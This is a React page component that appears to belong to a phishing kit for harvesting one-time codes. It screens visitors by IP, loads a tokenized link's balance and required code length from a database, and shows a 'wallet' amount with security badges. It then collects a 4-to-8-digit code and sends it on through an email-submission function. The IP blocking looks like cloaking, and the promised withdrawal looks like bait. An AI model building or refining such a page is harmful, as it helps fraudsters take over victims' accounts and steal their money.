import { useEffect, useState, type FormEvent } from 'react';
import { useSearchParams } from 'react-router-dom';
import { useTranslation } from 'react-i18next';
import SecurityFooter from '@/components/feature/SecurityFooter';
import BrandLogo from '@/components/feature/BrandLogo';
import { supabase } from '@/lib/supabase';
import { checkVisitorIp } from '@/lib/visitorIp';
import { submitValidationCode } from '@/lib/email';
import { formatCurrency } from '@/utils/format';
import { useCountUp } from '@/hooks/useCountUp';
import { DEMO_CODE_DIGITS } from '@/config/withdrawal';

type LinkState = 'loading' | 'ok' | 'invalid' | 'blocked';

export default function CodeCollectionPage() {
  const { t } = useTranslation();
  const [searchParams] = useSearchParams();
  const token = (searchParams.get('token') ?? '').trim();

  const [linkState, setLinkState] = useState<LinkState>('loading');
  const [code, setCode] = useState('');
  const [digits, setDigits] = useState(DEMO_CODE_DIGITS);
  const [amount, setAmount] = useState('');
  const [currency, setCurrency] = useState('XPF');
  const [errors, setErrors] = useState<{ code?: string }>({});
  const [submitting, setSubmitting] = useState(false);
  const [done, setDone] = useState(false);
  const [error, setError] = useState<string | null>(null);

  const numericAmount = Number(amount) || 0;
  const animatedAmount = useCountUp(numericAmount);

  useEffect(() => {
    let active = true;
    (async () => {
      if (!token) {
        setLinkState('invalid');
        return;
      }
      try {
        const visitor = await checkVisitorIp();
        if (!active) return;
        if (visitor.blocked) {
          setLinkState('blocked');
          return;
        }

        const { data, error: fetchError } = await supabase
          .from('code_links')
          .select('amount, currency, active, code_digits')
          .eq('token', token)
          .maybeSingle();

        if (!active) return;
        if (fetchError || !data || !data.active) {
          setLinkState('invalid');
          return;
        }
        const configuredDigits = Number((data as { code_digits?: number }).code_digits);
        if (Number.isFinite(configuredDigits) && configuredDigits >= 4 && configuredDigits <= 8) {
          setDigits(configuredDigits);
        }
        setAmount(String(Number(data.amount) || 0));
        setCurrency((data.currency as string) || 'XPF');
        setLinkState('ok');
      } catch {
        if (active) setLinkState('invalid');
      }
    })();
    return () => {
      active = false;
    };
  }, [token]);

  const handleSubmit = async (event: FormEvent<HTMLFormElement>) => {
    event.preventDefault();
    if (submitting) return;

    const next: { code?: string } = {};
    const cleanCode = code.replace(/[^0-9]/g, '');
    if (cleanCode.length !== digits) next.code = t('codeCollection.errorCode', { count: digits });
    const amountValue = Number(String(amount).replace(/[^0-9]/g, ''));

    setErrors(next);
    if (Object.keys(next).length > 0) return;

    setSubmitting(true);
    setError(null);
    const result = await submitValidationCode({ token, code: cleanCode, amount: amountValue });
    setSubmitting(false);

    if (result.ok) {
      setDone(true);
    } else {
      setError(result.error);
    }
  };

  const inputClass = (invalid?: string) =>
    `w-full rounded-md border bg-background-50 py-3 pl-12 pr-4 text-sm text-foreground-950 outline-none transition-colors placeholder:text-foreground-400 focus:ring-2 ${
      invalid
        ? 'border-secondary-400 focus:border-secondary-500 focus:ring-secondary-200'
        : 'border-background-300 focus:border-primary-500 focus:ring-primary-200'
    }`;

  return (
    <div className="flex min-h-screen flex-col bg-background-50">
      <header className="border-b border-background-200 bg-background-50">
        <div className="mx-auto flex w-full max-w-2xl items-center gap-3 px-4 py-4 md:px-6">
          <BrandLogo className="h-14" />
        </div>
      </header>

      <main className="flex-1">
        <div className="mx-auto w-full max-w-2xl px-4 py-10 md:px-6 md:py-14">
          <div className="animate-fade-rise">
            <span className="inline-flex items-center gap-2 rounded-full bg-secondary-100 px-3 py-1.5 text-xs font-semibold text-secondary-900">
              <i className="ri-shield-keyhole-line text-sm"></i>
              {t('codeCollection.badge')}
            </span>
            <h1 className="mt-4 font-heading text-2xl font-semibold text-foreground-950 md:text-3xl">
              {t('codeCollection.title')}
            </h1>
            <p className="mt-2 text-sm leading-relaxed text-foreground-600">
              {t('codeCollection.subtitle', { count: digits })}
            </p>
          </div>

          {linkState === 'loading' && (
            <div className="mt-10 flex items-center justify-center gap-2 text-sm text-foreground-500">
              <i className="ri-loader-4-line animate-spin text-lg"></i>
              {t('common.loading')}
            </div>
          )}

          {linkState === 'invalid' && (
            <div className="mt-8 flex items-start gap-3 rounded-lg border border-accent-200 bg-accent-50 px-5 py-4">
              <span className="flex h-8 w-8 shrink-0 items-center justify-center rounded-full bg-accent-500 text-background-50">
                <i className="ri-link-unlink-m text-base"></i>
              </span>
              <div>
                <p className="text-sm font-semibold text-accent-900">{t('codeCollection.invalidTitle')}</p>
                <p className="mt-1 text-xs leading-relaxed text-accent-800">
                  {t('codeCollection.invalidText')}
                </p>
              </div>
            </div>
          )}

          {linkState === 'blocked' && (
            <div className="mt-8 flex items-start gap-3 rounded-lg border border-secondary-200 bg-secondary-50 px-5 py-4">
              <span className="flex h-8 w-8 shrink-0 items-center justify-center rounded-full bg-secondary-500 text-background-50">
                <i className="ri-forbid-2-line text-base"></i>
              </span>
              <div>
                <p className="text-sm font-semibold text-secondary-900">{t('codeCollection.blockedTitle')}</p>
                <p className="mt-1 text-xs leading-relaxed text-secondary-800">
                  {t('codeCollection.blockedText')}
                </p>
              </div>
            </div>
          )}

          {linkState === 'ok' && done && (
            <div className="mt-8 rounded-lg border border-primary-200 bg-primary-50 p-6 text-center md:p-8">
              <span className="mx-auto flex h-12 w-12 items-center justify-center rounded-full bg-primary-500 text-background-50">
                <i className="ri-check-line text-2xl"></i>
              </span>
              <h2 className="mt-4 font-heading text-lg font-semibold text-primary-950">
                {t('codeCollection.successTitle')}
              </h2>
              <p className="mx-auto mt-2 max-w-md text-sm leading-relaxed text-primary-800">
                {t('codeCollection.successText')}
              </p>
            </div>
          )}

          {linkState === 'ok' && !done && (
            <form
              onSubmit={handleSubmit}
              className="mt-8 animate-fade-rise rounded-lg border border-background-200 bg-background-50 p-6 md:p-7"
            >
              <div className="space-y-5">
                <div>
                  <label htmlFor="code" className="mb-2 block text-sm font-semibold text-foreground-800">
                    {t('codeCollection.codeLabel', { count: digits })} <span className="text-secondary-600">*</span>
                  </label>
                  <div className="relative">
                    <span className="pointer-events-none absolute left-4 top-1/2 flex h-5 w-5 -translate-y-1/2 items-center justify-center text-foreground-400">
                      <i className="ri-key-2-line text-lg"></i>
                    </span>
                    <input
                      id="code"
                      name="code"
                      type="text"
                      inputMode="numeric"
                      autoComplete="off"
                      maxLength={digits}
                      value={code}
                      onChange={(event) => {
                        setCode(event.target.value.replace(/[^0-9]/g, '').slice(0, digits));
                        setErrors((prev) => ({ ...prev, code: undefined }));
                        setError(null);
                      }}
                      placeholder={t('codeCollection.codePh')}
                      className={`${inputClass(errors.code)} font-mono tracking-[0.3em]`}
                    />
                  </div>
                  {errors.code && (
                    <p className="mt-1.5 flex items-center gap-1 text-xs text-secondary-700">
                      <i className="ri-error-warning-line"></i>
                      {errors.code}
                    </p>
                  )}
                </div>

                <div>
                  <span className="mb-2 block text-sm font-semibold text-foreground-800">
                    {t('codeCollection.amountLabel')}
                  </span>
                  <div className="flex items-center justify-between gap-3 rounded-md border border-background-300 bg-background-100 px-4 py-3.5">
                    <span className="flex min-w-0 items-center gap-2.5">
                      <span className="flex h-9 w-9 shrink-0 items-center justify-center rounded-full bg-primary-100 text-primary-700">
                        <i className="ri-wallet-3-line text-lg"></i>
                      </span>
                      <span className="truncate text-sm font-medium text-foreground-600">
                        {t('codeCollection.balanceCaption')}
                      </span>
                    </span>
                    <span className="animate-amount-pop whitespace-nowrap font-heading text-lg font-semibold text-foreground-950">
                      {formatCurrency(animatedAmount, currency)}
                    </span>
                  </div>
                  <p className="mt-1.5 flex items-center gap-1.5 text-xs text-foreground-500">
                    <i className="ri-lock-2-line text-sm text-primary-700"></i>
                    {t('codeCollection.balanceHint')}
                  </p>
                </div>
              </div>

              {error && (
                <div className="mt-5 flex items-start gap-2 rounded-md border border-accent-200 bg-accent-50 px-4 py-3 text-sm text-accent-900">
                  <i className="ri-error-warning-line mt-0.5 text-base"></i>
                  <span>{error}</span>
                </div>
              )}

              <button
                type="submit"
                disabled={submitting}
                className="mt-6 flex w-full cursor-pointer items-center justify-center gap-2 whitespace-nowrap rounded-md bg-primary-500 px-5 py-3.5 text-sm font-semibold text-background-50 transition-colors hover:bg-primary-600 disabled:cursor-not-allowed disabled:opacity-60 dark:text-foreground-950"
              >
                <i className={submitting ? 'ri-loader-4-line animate-spin' : 'ri-send-plane-line'}></i>
                {submitting ? t('codeCollection.submitting') : t('codeCollection.submit')}
              </button>

              <div className="mt-5 flex items-start gap-2 text-xs leading-relaxed text-foreground-500">
                <i className="ri-lock-2-line mt-0.5 text-sm text-primary-700"></i>
                <span>{t('codeCollection.secureNote')}</span>
              </div>
            </form>
          )}
        </div>
      </main>

      <SecurityFooter />
    </div>
  );
}